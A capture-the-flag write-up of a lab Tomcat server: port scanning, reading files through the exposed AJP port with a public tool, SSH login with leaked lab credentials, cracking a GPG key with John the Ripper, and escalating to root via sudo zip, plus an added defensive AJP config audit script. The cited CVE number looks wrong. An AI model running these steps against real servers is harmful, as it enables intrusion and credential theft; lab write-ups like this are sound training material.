This room was fun and one of the easier ones once I found some tooling on GitHub. I like that they have rooms related to the CVEs that are published and give you some experience with them. Well, enough with the intro; time to get to it.
The first thing that I always do is run an nmap scan. The one that I usually do first is `nmap -p- IP_ADDRESS` to get a scan of all the ports that are open. Once I have the list to narrow down, I then will do a more focused scan to get versions and possible scripts that could be run. That command looks like `nmap -p PORTS -sC -sV -oA server IP_ADDRESS`. The output is in the next section below.
```
Nmap scan report for 10.10.69.119
Host is up (0.28s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
I can see that there is a different port than usual open, 8009, and it has a service of Apache Jserv running. I don't know what that is, so it's off to Google to see what we can come up with. While I am doing that, I run gobuster against port 8080 to see if there are any pages of interest, and the results are below.
```
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/]
```
This is an Apache Tomcat server and the version that it's running (9.0.30) is related to CVE-2020-10487. I searched GitHub and came across this tool, 00theway, and that seemed to give me what I needed. I used the following command to see what output I would get from the server.
```
python ajpShooter.py http://10.10.106.104:8080 8009 /WEB-INF.xml read
```
I got a good response and the following credentials were found.
- Username: skyfuck
- Password: 8730281lkjlkjdqlksalks
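
The defender's side of the exposed 8009/tcp AJP listener from the scan above, as an added example (not from the original post or the ajpShooter project): a small audit of Tomcat's `server.xml` that flags AJP connectors reachable off-host or accepting requests without a shared secret. The sample XML is constructed, and `audit_ajp`, `is_ajp` and `legacy_defaults` are hypothetical names.

```python
import xml.etree.ElementTree as ET

# Constructed sample: AJP connector enabled with no address or secret, as in
# older default configs such as the 9.0.30 release seen in the scan.
SAMPLE_EXPOSED = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""

# Constructed sample: same connector bound to loopback with a shared secret.
SAMPLE_HARDENED = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="CHANGE_ME_PLACEHOLDER"/>
</Service></Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def is_ajp(protocol):
    """Match 'AJP/1.3' as well as class names like org.apache.coyote.ajp.*"""
    p = (protocol or "").lower()
    return p.startswith("ajp") or ".ajp." in p

def audit_ajp(server_xml, legacy_defaults=True):
    """Return (port, finding) tuples for risky AJP connectors.

    legacy_defaults=True models older Tomcat releases, where a missing
    address meant all interfaces and no secret was required. Newer releases
    default to loopback and secretRequired="true".
    """
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not is_ajp(conn.get("protocol")):
            continue
        port, addr = conn.get("port", "?"), conn.get("address")
        if addr is None and legacy_defaults:
            findings.append((port, "no address: listens on all interfaces"))
        elif addr is not None and addr not in LOOPBACK:
            findings.append((port, f"bound to non-loopback address {addr}"))
        # 'requiredSecret' is the older spelling of the 'secret' attribute.
        has_secret = conn.get("secret") or conn.get("requiredSecret")
        default_req = "false" if legacy_defaults else "true"
        required = conn.get("secretRequired", default_req).lower() == "true"
        if not has_secret and not required:
            findings.append((port, "no secret: any peer reaching the port is trusted"))
    return findings

if __name__ == "__main__":
    for port, finding in audit_ajp(SAMPLE_EXPOSED):
        print(f"AJP connector on port {port}: {finding}")
```

If nothing in front of Tomcat speaks AJP, removing or commenting out the connector is simpler than hardening it.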
Time to see what we can do with the credentials that we found. Let's see if ssh will work with the username and password that were found above. And I am in luck, I am now on the box as skyfuck. As always, the next thing to do is list the contents of the directory that I am in and I see that we have a private key and an encrypted message.
The next step is to download those items to my VM. To do that I will use scp to copy using the following command:
After getting the items on the VM I try to import the private key and I can't because I don't have the password.
Time to convert the key to a format that John the Ripper can read. Since I can't remember where the file is located on my machine, `locate gpg2john` will be used to find it. Once the program is found, the next thing to do is use it to convert the file: `./gpg2john private_key > key.hash` and then `john --wordlist=~/CTF/words/pass.txt key.hash`.
Here is the output of what JtR tells me.
```
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)
1g 0:00:00:00 DONE (2022-04-23 17:10) 5.555g/s 63288p/s 63288c/s 63288C/s alexander..amaleta
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Now I have the key that I need to import the private key and then decrypt the encrypted message.
```
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <email@example.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
```
I now have a different user and password to use. So, I will switch to that user and see what that user can do. I see that there is the user flag file in Merlin's home folder, so let's submit that before I forget.
Now that I am Merlin, I use `sudo -l` to see what Merlin can do as a super user. I see that Merlin can run zip as a super user. With that information it's off to GTFOBins to see how that can be used to get the root.txt flag.
Using the command that is given on that website I now can elevate to the root user and then view the root.txt file and the room is complete.
As always, if you have questions or feedback about anything I say please email me.